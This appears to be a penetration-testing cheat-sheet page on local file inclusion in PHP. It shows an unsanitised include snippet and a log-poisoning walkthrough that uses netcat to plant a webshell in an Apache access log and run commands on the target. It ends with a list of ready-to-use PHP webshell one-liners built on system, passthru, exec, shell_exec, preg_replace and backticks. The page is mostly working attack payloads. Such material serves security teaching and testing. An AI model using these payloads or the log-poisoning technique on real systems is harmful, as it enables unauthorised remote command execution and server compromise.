LFI - Theory & basic commands

#Identifying file inclusions:

Code review:

<?php
 $file = $_GET[“file”];
 include $file; ?>

In code that looks like this, the command is executed without being sanitized.

#This type of attack assumes the ability to upload malicious files into the target application. If this is not possible directly, poisoning log files might be an option. Using netcat to post a request with a malicious php string can function as an effective hook to trigger a vulnerability.

#netcat

nc –nv 192.168.177.10  80  #connect to target
<?php system($_GET['cmd']); ?>

#Connection might hang at this point
#check out log file to trigger RC

….file=c:\xampp\apache\logs\access.log&cmd=ipconfig

  (read ipconfig of target)

http://192.168.177.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

#PHP webshells

# Basic
<?php system("whoami"); ?>

#Get command execution on target
<?php system($_GET['cmd']); ?>

# Using passthru
<?php passthru($_GET['cmd']); ?>

# Echo output
<?php echo shell_exec("whoami");?>

<?php echo exec("whoami");?>

# Returns output as an array then print.
<?php exec("ls -la",$array); print_r($array); ?>

# preg_replace().
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

<?php echo `whoami`; ?>

PreviousCRLFINextRFI - Theory & basic commands

Last updated